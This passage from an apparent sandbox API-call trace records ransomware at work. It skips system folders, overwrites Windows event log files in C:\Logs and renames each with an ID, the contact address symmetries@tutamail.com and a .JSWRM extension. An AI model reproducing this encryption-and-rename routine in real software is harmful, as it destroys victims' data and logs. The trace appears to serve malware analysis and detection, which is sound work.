lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.102] CreateFileW (lpFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0067.103] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=1118208) returned 1 [0067.103] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2491b8 [0067.103] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0067.122] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.123] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0067.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0067.123] CloseHandle (hObject=0x450) returned 1 [0067.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0067.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0067.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8670, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0067.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0067.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0067.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0067.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0067.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x233230 [0067.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0067.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8c) returned 0x23b400 [0067.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0067.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0067.297] MoveFileW (lpExistingFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), lpNewFileName="C:\\Logs\\Security.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\security.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0067.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0067.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.298] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a6db2c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x95a6db2c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.evtx", cAlternateFileName="SETUP~1.EVT")) returned 1 [0067.298] lstrcmpiW (lpString1="Setup.evtx", lpString2=".") returned 1 [0067.298] lstrcmpiW (lpString1="Setup.evtx", lpString2="..") returned 1 [0067.298] lstrcmpiW (lpString1="Setup.evtx", lpString2="...") returned 1 [0067.298] lstrcmpiW (lpString1="Setup.evtx", lpString2="windows") returned -1 [0067.298] lstrcmpiW (lpString1="Setup.evtx", lpString2="recovery") returned 1 [0067.298] lstrcmpiW (lpString1="Setup.evtx", lpString2="perflogs") returned 1 [0067.298] lstrcmpiW (lpString1="Setup.evtx", lpString2="documents and settings") returned 1 [0067.298] lstrcmpiW (lpString1="Setup.evtx", lpString2="$RECYCLE.BIN") returned 1 [0067.298] lstrcmpiW (lpString1="Setup.evtx", lpString2="system volume information") returned -1 [0067.298] lstrcmpiW (lpString1="Setup.evtx", lpString2="msocache") returned 1 [0067.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0067.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Setup.evtx", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0067.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Setup.evtx", cchWideChar=10, lpMultiByteStr=0x345f978, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.evtx", lpUsedDefaultChar=0x0) returned 10 [0067.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0067.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0067.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Setup.evtx", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0067.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Setup.evtx", cchWideChar=10, lpMultiByteStr=0x345f948, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.evtx", lpUsedDefaultChar=0x0) returned 10 [0067.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0067.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.298] CreateFileW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0067.299] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0067.299] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0067.299] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0067.306] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.306] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0067.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0067.306] CloseHandle (hObject=0x450) returned 1 [0067.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0067.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0067.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0067.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0067.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0067.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0067.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0067.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2373f8 [0067.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0067.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0067.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2373f8 | out: hHeap=0x1e0000) returned 1 [0067.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0067.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0067.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0067.309] MoveFileW (lpExistingFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), lpNewFileName="C:\\Logs\\Setup.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\setup.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0067.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0067.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0067.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.309] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505097c4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505097c4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.evtx", cAlternateFileName="SYSTEM~1.EVT")) returned 1 [0067.309] lstrcmpiW (lpString1="System.evtx", lpString2=".") returned 1 [0067.309] lstrcmpiW (lpString1="System.evtx", lpString2="..") returned 1 [0067.309] lstrcmpiW (lpString1="System.evtx", lpString2="...") returned 1 [0067.309] lstrcmpiW (lpString1="System.evtx", lpString2="windows") returned -1 [0067.309] lstrcmpiW (lpString1="System.evtx", lpString2="recovery") returned 1 [0067.309] lstrcmpiW (lpString1="System.evtx", lpString2="perflogs") returned 1 [0067.309] lstrcmpiW (lpString1="System.evtx", lpString2="documents and settings") returned 1 [0067.309] lstrcmpiW (lpString1="System.evtx", lpString2="$RECYCLE.BIN") returned 1 [0067.309] lstrcmpiW (lpString1="System.evtx", lpString2="system volume information") returned 1 [0067.309] lstrcmpiW (lpString1="System.evtx", lpString2="msocache") returned 1 [0067.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0067.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.evtx", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0067.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.evtx", cchWideChar=11, lpMultiByteStr=0x345f978, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System.evtx", lpUsedDefaultChar=0x0) returned 11 [0067.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0067.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.evtx", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0067.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.evtx", cchWideChar=11, lpMultiByteStr=0x345f948, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System.evtx", lpUsedDefaultChar=0x0) returned 11 [0067.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.310] CreateFileW (lpFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0067.311] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=1118208) returned 1 [0067.311] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24a1c0 [0067.311] ReadFile (in: hFile=0x450, lpBuffer=0x24a1c0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x24a1c0*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0067.323] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.323] WriteFile (in: hFile=0x450, lpBuffer=0x24a1c0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x24a1c0*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0067.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24a1c0 | out: hHeap=0x1e0000) returned 1 [0067.324] CloseHandle (hObject=0x450) returned 1 [0067.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0067.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0067.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8670, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0067.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0067.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0067.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0067.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0067.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232e20 [0067.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0067.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8c) returned 0x23b400 [0067.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0067.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0067.395] MoveFileW (lpExistingFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), lpNewFileName="C:\\Logs\\System.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\system.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0067.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0067.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.395] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows PowerShell.evtx", cAlternateFileName="WINDOW~1.EVT")) returned 1 [0067.395] lstrcmpiW (lpString1="Windows PowerShell.evtx", lpString2=".") returned 1 [0067.395] lstrcmpiW (lpString1="Windows PowerShell.evtx", lpString2="..") returned 1 [0067.395] lstrcmpiW (lpString1="Windows PowerShell.evtx", lpString2="...") returned 1 [0067.395] lstrcmpiW (lpString1="Windows PowerShell.evtx", lpString2="windows") returned 1 [0067.395] lstrcmpiW (lpString1="Windows PowerShell.evtx", lpString2="recovery") returned 1 [0067.395] lstrcmpiW (lpString1="Windows PowerShell.evtx", lpString2="perflogs") returned 1 [0067.395] lstrcmpiW (lpString1="Windows PowerShell.evtx", lpString2="documents and settings") returned 1 [0067.396] lstrcmpiW (lpString1="Windows PowerShell.evtx", lpString2="$RECYCLE.BIN") returned 1 [0067.396] lstrcmpiW (lpString1="Windows PowerShell.evtx", lpString2="system volume information") returned 1 [0067.396] lstrcmpiW (lpString1="Windows PowerShell.evtx", lpString2="msocache") returned 1 [0067.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0067.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows PowerShell.evtx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0067.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0067.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows PowerShell.evtx", cchWideChar=23, lpMultiByteStr=0x2412b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows PowerShell.evtx", lpUsedDefaultChar=0x0) returned 23 [0067.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0067.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0067.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows PowerShell.evtx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0067.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows PowerShell.evtx", cchWideChar=23, lpMultiByteStr=0x241268, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows PowerShell.evtx", lpUsedDefaultChar=0x0) returned 23 [0067.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0067.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0067.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0067.396] CreateFileW (lpFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0067.397] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0067.397] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x24a1c0 [0067.397] ReadFile (in: hFile=0x450, lpBuffer=0x24a1c0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x24a1c0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0067.402] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.402] WriteFile (in: hFile=0x450, lpBuffer=0x24a1c0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x24a1c0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0067.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24a1c0 | out: 